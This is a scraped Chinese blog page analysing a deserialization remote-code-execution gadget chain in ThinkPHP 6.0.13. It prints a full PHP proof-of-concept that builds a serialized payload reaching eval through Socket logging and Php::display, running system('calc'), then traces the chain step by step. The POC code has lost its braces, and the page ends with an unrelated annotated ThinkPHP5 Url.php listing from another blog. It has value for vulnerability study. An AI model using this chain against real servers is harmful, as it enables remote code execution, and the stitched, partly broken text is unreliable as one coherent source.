Think PHP 6.0.13反序列化分析

Posted qq_60481227

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Think PHP 6.0.13反序列化分析相关的知识,希望对你有一定的参考价值。

原poc链接:https://github.com/top-think/framework/issues/2749

think PHP 6.0.13下载

composer create-project topthink/think tp

poc源码

<?php

namespace League\\Flysystem\\Cached\\Storage

    class Psr6Cache
        private $pool;
        protected $autosave = false;
        public function __construct($exp)
        
            $this->pool = $exp;
        
    


namespace think\\log
    class Channel
        protected $logger;
        protected $lazy = true;

        public function __construct($exp)
        
            $this->logger = $exp; 
            $this->lazy = false;
        
    


namespace think
    class Request
        protected $url;
        public function __construct()
        
            $this->url = '<?php system(\\'calc\\'); exit(); ?>';
        
    
    class App
        protected $instances = [];
        public function __construct()
        
            $this->instances = ['think\\Request'=>new Request()];
        
    


namespace think\\view\\driver
    class Php


namespace think\\log\\driver
    class Socket
        protected $config = [];
        protected $app;
        protected $clientArg = [];

        public function __construct()
        
            
            $this->config = [
                'debug'=>true,
                'force_client_ids' => 1,
                'allow_client_ids' => '',
                'format_head' => [new \\think\\view\\driver\\Php,'display'], # 利用类和方法
            ];
            $this->app = new \\think\\App();
            $this->clientArg = ['tabid'=>'1'];
        
    


namespace
    $c = new think\\log\\driver\\Socket();
    $b = new think\\log\\Channel($c);
    $a = new League\\Flysystem\\Cached\\Storage\\Psr6Cache($b);
    echo base64_encode(serialize($a));

分析

从POC开始分析

起始类是Psr6Cache类,但是在Psr6Cache类中没有发现__destruct()方法,在定义类的地方发现其继承了AbstractCache类。通过全局查找__destruct方法定位到src/Storage/AbstractCache.php

这里对autosave变量进行判断是否为false,$autosave是成员变量可以控制,后调用了save方法,跟进save方法

 调用了pool的getItem方法,这里AbstractCache->pool是可控的,找一下__call方法,根据POC找到Channel.php

 调用了log方法,再跟进record方法(记录日志信息)

 

 在record方法中的前三个判断都可以过,主要看第四个判断,因为这里是要利用$this->save方法

$lazy默认是true不可控,但是$this->lazy是成员变量可控,因此可以进入save方法。继续 跟进save方法。

在save方法判断了$this-event是否有值,这里默认是没有的,可以跳过,到$this->logger->save()

 这里调用了$this->logger记录器的save方法,然而这里的logger是成员变量,是可控的。根据POC可以发现这里利用了socket的save方法

namespace think\\log
    class Channel
        protected $logger;
        protected $lazy = true;

        public function __construct($exp)
        //$exp=new socket()
            $this->logger = $exp; 
            $this->lazy = false;
        
    

 全局找一下save方法,继续跟进socket的save方法

这里首先对自身进行了检查,不通过就返回false,这里我们必须要check方法返回true,跟进check方法。check方法的主要功能是获取用户输入的taid参数、检查是否记录日志和用户认证。

这里看一下检查request实例对象的分支

 这里在POC中给了App中request的实例对象

再回到socket的save方法

判断debug是否开启,这里可控。这里有判断了$this->app的request实例对象是否存在,这里可以直接进入,然后获取request实例对象的url的值(这个值是重点)。然后判断this->config['format_head']是否存在,存在的话就调用$this->app的inoke方法,尝试调用反射执行this->config['format_head']的方法,参数是$currentUri。在这里我们只要找到可以执行危险操作的危险函数,并将其控制到this->config['format_head']里面就可以进行RCE了。而这个config是一个成员变量,是可控的,因此只要寻找危险方法就可以了。这里POC找的是Php类的display方法,里面存在eval函数。

POC通过控制config即可控制程序执行到Php类的display方法。

在POC中控制了App对象中request实例对象的url的值

(socket)$this->app->request->url='<?php system(\\'calc\\'); exit(); ?>']

在display方法中执行eval('?><?php system(\\'calc\\'); exit(); ?>'),成功调用系统计算器

此次反序列化漏洞主要需要控制的点,是在Socket类中的变量控制,和Php中的display方法的利用。还要一点就是在构造POC时Psr6Cache类的pool变量必须要写在前面,否则生成的payload是无效的。。。自己在仿造POC时调试了很久。

 此次分析就到这吧,感谢秋秋晚的指点

参考:TP6.0.13反序列化简单分析 - 秋秋晚

[李景山php]每天TP5-20170116|thinkphp5-Url.php-1

namespace think;

use think\Config;
use think\Loader;
use think\Request;
use think\Route;
// 使用 think 里面,内置的 Config Loader Request Route
class Url
{
    // 生成URL地址的root
    protected static $root;// 根地址

    /**
     * URL生成 支持路由反射
     * @param string            $url 路由地址
     * @param string|array      $vars 参数(支持数组和字符串)a=val&b=val2... [‘a‘=>‘val1‘, ‘b‘=>‘val2‘]
     * @param string|bool       $suffix 伪静态后缀,默认为true表示获取配置值
     * @param boolean|string    $domain 是否显示域名 或者直接传入域名
     * @return string
     */
    public static function build($url = ‘‘, $vars = ‘‘, $suffix = true, $domain = false)
    {// url 支持路由反射 $url 路由地址 $vars 参数 a=val b=val2  后缀 是否显示域名
        if (false === $domain && Config::get(‘url_domain_deploy‘)) {// 如果配置文件支持 域名 设置的话,可以设置过来
            $domain = true;
        }
        // 解析URL
        if (0 === strpos($url, ‘[‘) && $pos = strpos($url, ‘]‘)) {// 如果是用 路由规则的方式 [name]
            // [name] 表示使用路由命名标识生成URL
            $name = substr($url, 1, $pos - 1);// 获取 路由标识 字符串
            $url  = ‘name‘ . substr($url, $pos + 1); // 拼接 成为 新的 字符串
        }
        $info = parse_url($url);// 根据 url 解析,暂时中断一下
        //var_dump(parse_url(‘home/index/index‘));
        //array(1) { ["path"]=> string(16) "home/index/index" }
        // 中断一下  系统函数  应该会解析返回一个数组 关系
        // 尝试一下 parse_url(‘home/index/index‘)---->输出什么
        $url  = !empty($info[‘path‘]) ? $info[‘path‘] : ‘‘;// 为空 代表 路径
        if (isset($info[‘fragment‘])) {// 如果存在锚点
            // 解析锚点
            $anchor = $info[‘fragment‘];// 获取锚点信息
            if (false !== strpos($anchor, ‘?‘)) {
                // 解析参数
                list($anchor, $info[‘query‘]) = explode(‘?‘, $anchor, 2);// 解析参数
            }
            if (false !== strpos($anchor, ‘@‘)) {
                // 解析域名
                list($anchor, $domain) = explode(‘@‘, $anchor, 2);// 解析域名
            }
        } elseif (strpos($url, ‘@‘)) {// 存在域名
            // 解析域名
            list($url, $domain) = explode(‘@‘, $url, 2);
        }

        // 解析参数
        if (is_string($vars)) {
            // aaa=1&bbb=2 转换成数组
            parse_str($vars, $vars);// 解析字符串 为数组 默认推荐传入数组格式
        }

        if ($url) {// 如果 url 存在
            $rule = Route::name(isset($name) ? $name : $url . (isset($info[‘query‘]) ? ‘?‘ . $info[‘query‘] : ‘‘));
            // 规则 等于 路由优先 有路由先看路由,然后用 url 拼接参数
            if (is_null($rule) && isset($info[‘query‘])) {// 如果 url 为空,但是设置了参数
                $rule = Route::name($url);// 获取 name
                // 解析地址里面参数 合并到vars
                parse_str($info[‘query‘], $params);// 解析参数
                $vars = array_merge($params, $vars);// 合并参数
                unset($info[‘query‘]);//删除信息
            }
        }
        if (!empty($rule) && $match = self::getRuleUrl($rule, $vars)) {// 如果规则不为空,并且 也能匹配到对应的路由标识
            // 匹配路由命名标识
            $url = $match[0];// 分别 返回 url
            if (!empty($match[1])) {
                $domain = $match[1];//域名
            }
        } elseif (!empty($rule) && isset($name)) {// 如果不为空 设置名字
            throw new \InvalidArgumentException(‘route name not exists:‘ . $name);// 抛出异常
        } else {
            if (isset($info[‘query‘])) {
                // 解析地址里面参数 合并到vars
                parse_str($info[‘query‘], $params);
                $vars = array_merge($params, $vars);
            }
            // 路由标识不存在 直接解析
            $url = self::parseUrl($url, $domain);// 路由不存在,就直接解析
        }

        // 检测URL绑定
        $type = Route::getBind(‘type‘);
        if ($type) {
            $bind = Route::getBind($type);
            if (0 === strpos($url, $bind)) {
                $url = substr($url, strlen($bind) + 1);
            }
        }
        // 还原URL分隔符
        $depr = Config::get(‘pathinfo_depr‘);
        $url  = str_replace(‘/‘, $depr, $url);

        // URL后缀
        $suffix = in_array($url, [‘/‘, ‘‘]) ? ‘‘ : self::parseSuffix($suffix);
        // 锚点
        $anchor = !empty($anchor) ? ‘#‘ . $anchor : ‘‘;
        // 参数组装
        if (!empty($vars)) {
            // 添加参数
            if (Config::get(‘url_common_param‘)) {
                $vars = urldecode(http_build_query($vars));
                $url .= $suffix . ‘?‘ . $vars . $anchor;
            } else {
                foreach ($vars as $var => $val) {
                    if (‘‘ !== trim($val)) {
                        $url .= $depr . $var . $depr . urlencode($val);
                    }
                }
                $url .= $suffix . $anchor;
            }
        } else {
            $url .= $suffix . $anchor;
        }
        // 检测域名
        $domain = self::parseDomain($url, $domain);
        // URL组装
        $url = $domain . (self::$root ?: Request::instance()->root()) . ‘/‘ . ltrim($url, ‘/‘);
        return $url;
        // 此处的重点 是 root 是否可以获取 root 资源里面 index.php 这个后缀
    }

    // 直接解析URL地址
    protected static function parseUrl($url, $domain)// 解析 你的 URL 跟 系统的解析 应该不一样吧
    {
        $request = Request::instance();// 获取 请求的 实例化
        if (0 === strpos($url, ‘/‘)) {// 如果是 根目录形式的 直接解析
            // 直接作为路由地址解析
            $url = substr($url, 1);
        } elseif (false !== strpos($url, ‘\\‘)) {// 这种写法 跟 类 命名空间相似
            // 解析到类
            $url = ltrim(str_replace(‘\\‘, ‘/‘, $url), ‘/‘);// 直接替换称为 url
        } elseif (0 === strpos($url, ‘@‘)) {// 如果 有@ 符号,代表为控制器
            // 解析到控制器
            $url = substr($url, 1);
        } else {
            // 解析到 模块/控制器/操作
            // 默认的大部分 应该就是这种情况
            $module  = $request->module();// 获取模块 名字
            $domains = Route::rules(‘domain‘);// 获取域名 规则
            if (isset($domains[$domain][‘[bind]‘][0])) {// 如果关于这个规则 存在
                $bindModule = $domains[$domain][‘[bind]‘][0];// 二级域名自动映射模块
                if ($bindModule && !in_array($bindModule[0], [‘\\‘, ‘@‘])) {
                    $module = ‘‘;// 模型为空
                }
            } else {
                $module = $module ? $module . ‘/‘ : ‘‘;// 空模型
            }

            $controller = Loader::parseName($request->controller());// 控制器
            if (‘‘ == $url) {
                // 空字符串输出当前的 模块/控制器/操作
                $url = $module . $controller . ‘/‘ . $request->action();// 空的输出当前的
            } else {// 重新 获取 这些
                $path       = explode(‘/‘, $url);
                $action     = Config::get(‘url_convert‘) ? strtolower(array_pop($path)) : array_pop($path);
                $controller = empty($path) ? $controller : (Config::get(‘url_convert‘) ? Loader::parseName(array_pop($path)) : array_pop($path));
                $module     = empty($path) ? $module : array_pop($path) . ‘/‘;
                $url        = $module . $controller . ‘/‘ . $action;
            }
        }
        return $url;// 返回 模型/控制器/方法
    }


本文出自 “专注php 群号:414194301” 博客,请务必保留此出处http://jingshanls.blog.51cto.com/3357095/1882473

以上是关于Think PHP 6.0.13反序列化分析的主要内容,如果未能解决你的问题,请参考以下文章

PHP7:反序列化漏洞案例及分析

PHP7:反序列化漏洞案例及分析(上)

PHP反序列化漏洞

审计之PHP反序列化漏洞详解(附实例)

PHP内核层解析反序列化漏洞

[极客大挑战]PHP——目录泄露+反序列化